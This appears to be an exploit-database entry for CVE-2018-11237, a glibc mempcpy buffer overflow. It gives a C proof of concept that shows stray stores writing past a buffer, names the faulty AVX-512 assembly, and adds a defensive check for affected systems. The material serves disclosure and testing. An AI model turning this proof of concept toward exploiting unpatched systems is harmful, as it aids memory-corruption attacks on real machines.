GNU glibc < 2.27 - Local Buffer Overflow
Source: http://jameelnabbo.com  Author: Nabbo  Published: 2018-05-28

# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: http://jameelnabbo.com/
# Vendor Homepage: http://www.gnu.org/
# CVE: CVE-2018-11237

# POC:

$ cat mempcpy.c
#define _GNU_SOURCE 1            /* mempcpy is a GNU extension */
#include <string.h>
#include <assert.h>

#define N 97699                  /* a copy length on which the bug shows up */
char a[N];                       /* source, filled with 'x' below */
char b[N+128];                   /* destination plus 128 zeroed bytes of slack */

int
main (void)
{
  memset (a, 'x', N);
  char *c = mempcpy (b, a, N);   /* c should be b+N, whose contents should still be 0 */
  assert (*c == 0);              /* fails: the stray stores overwrote the bytes past b+N */
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.

The problem is these two stores in memmove-avx512-no-vzeroupper.S, which use %rax as their base register:

 vmovups %zmm4, (%rax)
 vmovups %zmm5, 0x40(%rax)

For mempcpy, %rax holds the return value, i.e. a pointer to the end of the destination buffer, so the two 64-byte stores land past the end of the buffer instead of inside it. That is why the PoC above finds non-zero bytes at b+N.
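An added check (not from the original post) that a defender can compile on a system to see whether its glibc mempcpy overruns the destination for a given length: it surrounds the destination with a known guard pattern, calls the real libc mempcpy through a volatile function pointer (instead of the page's -fno-builtin-mempcpy flag, so the compiler cannot inline a builtin), and counts how many guard bytes changed. The function and macro names are this example's own.

```c
#define _GNU_SOURCE 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Guard bytes kept after the destination: the stores quoted on the page
   reach 0x40 + 64 = 128 bytes past it, so 256 leaves headroom. */
#define GUARD 256

/* Call through a volatile function pointer so the compiler cannot inline
   a builtin (the page used -fno-builtin-mempcpy for this); the libc
   ifunc-selected variant, e.g. the AVX-512 one, is then what runs. */
static void *(*volatile libc_mempcpy)(void *, const void *, size_t) = mempcpy;

/* Number of guard bytes past dst+len that mempcpy(dst, src, len)
   overwrote; -1 if the copy or the returned pointer was wrong.
   0 means this libc is not affected for this length. */
long check_mempcpy_overrun(size_t len)
{
    unsigned char *src = malloc(len + 1);
    unsigned char *dst = malloc(len + GUARD);
    if (!src || !dst) { free(src); free(dst); return -1; }
    memset(src, 'x', len);           /* same fill as the page's PoC */
    memset(dst, 0xA5, len + GUARD);  /* known pattern in the guard region */
    unsigned char *end = libc_mempcpy(dst, src, len);
    long clobbered = 0;
    if (end != dst + len || memcmp(dst, src, len) != 0) {
        clobbered = -1;              /* wrong return value or bad copy */
    } else {
        for (size_t i = 0; i < GUARD; i++)
            if (dst[len + i] != 0xA5)
                clobbered++;
    }
    free(src);
    free(dst);
    return clobbered;
}

int main(void)
{
    /* 97699 is the length from the page's PoC; the others are sanity cases */
    size_t lens[] = { 97699, 1, 64, 4096 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("len %zu: %ld guard bytes clobbered\n",
               lens[i], check_mempcpy_overrun(lens[i]));
    return 0;
}
```

On a fixed glibc every length reports 0; a non-zero count for the PoC length on an AVX-512 machine means the patched memmove-avx512-no-vzeroupper.S has not been applied.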